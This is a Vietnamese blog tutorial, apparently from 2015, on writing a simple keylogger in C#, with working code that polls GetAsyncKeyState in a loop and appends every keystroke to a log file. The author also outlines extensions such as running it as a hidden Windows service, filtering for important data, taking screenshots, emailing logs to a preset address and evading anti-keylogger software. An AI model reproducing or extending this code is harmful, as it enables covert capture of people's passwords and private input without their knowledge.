NEWS

Viết 1 Keylogger đơn giản

Viết 1 Keylogger đơn giản
Đăng bởi: Mr. Cùi Bắp - Lượt xem: 16065 01:16:57, 16/11/2015C#   In bài viết

Bài viết nay tôi xin giới thiệu với các bạn cách viết một keylogger đơn giản. Chủ yếu của bài này là giúp bạn ghi lại tất cả các phím mà người sử dụng máy tính đã thao tác.

Nhưng nếu muốn phát triển hơn thì các bạn cần phải xử lý nhiều vấn đề khác phức tạp hơn như là: sử dụng windows service để ứng dụng luôn chạy, lọc để ghi những thông tin quan trọng mà thôi, chụp lại màn hình nhập liệu, tự động gởi thông tin về địa chỉ mail đã được định sẵn và chống lại những phần mềm diệt keylogger.

Nếu có thời gian tôi sẽ giới thiệu tiếp cho các bạn những phần nhỏ trong đó ở những bài sau

Để đơn giản mình sẽ viết dưới dạng Console. Trong bài này chủ yếu là mình sử dụng thư viện có sẵn cho window

[DllImport("user32.dll")]
		public static extern int GetAsyncKeyState(Int32 i);

Hàm main của chương trình

static void Main(string[] args)
		{
			Console.WriteLine("Co muon chay Keylogger? Y/N");
			string YesNo = Console.ReadLine();
			if (YesNo.Equals("Y") || YesNo.Equals("y"))
			{
				Console.WriteLine("Bat dau thuc hien");
				Console.WriteLine("--------------------------");
				Start();
			}
			else
			{
				Console.WriteLine("Thoat...");
				Application.Exit();
			}
		}

Và đây là hàm quan trọng nhất giúp mình ghi lại tất cả các thao tác của người dùng:

static void Start()
		{
			while (true)
			{
				Thread.Sleep(10);
				for (Int32 i = 0; i < 255; i++)
				{
					int keyState = GetAsyncKeyState(i);
					if (keyState == 1 || keyState == -32767)
					{
						Console.WriteLine((Keys)i);
						string toStringKeys = Convert.ToString((Keys)i);
						File.AppendAllText(Application.StartupPath + "KeyLogs.txt", Environment.NewLine + toStringKeys);
						break;
					}
				}
			}
		}

Giờ thì F5 và thưởng thức thôi. Chúc các bạn vui với bài nhỏ này!

Link download

Tags:

THÔNG TIN TÁC GIẢ

BÀI VIẾT LIÊN QUAN

Viết 1 Keylogger đơn giản
Đăng bởi: Mr. Cùi Bắp - Lượt xem: 16065 01:16:57, 16/11/2015C#   In bài viết

CÁC BÀI CÙNG CHỦ ĐỀ

Đọc tiếp
.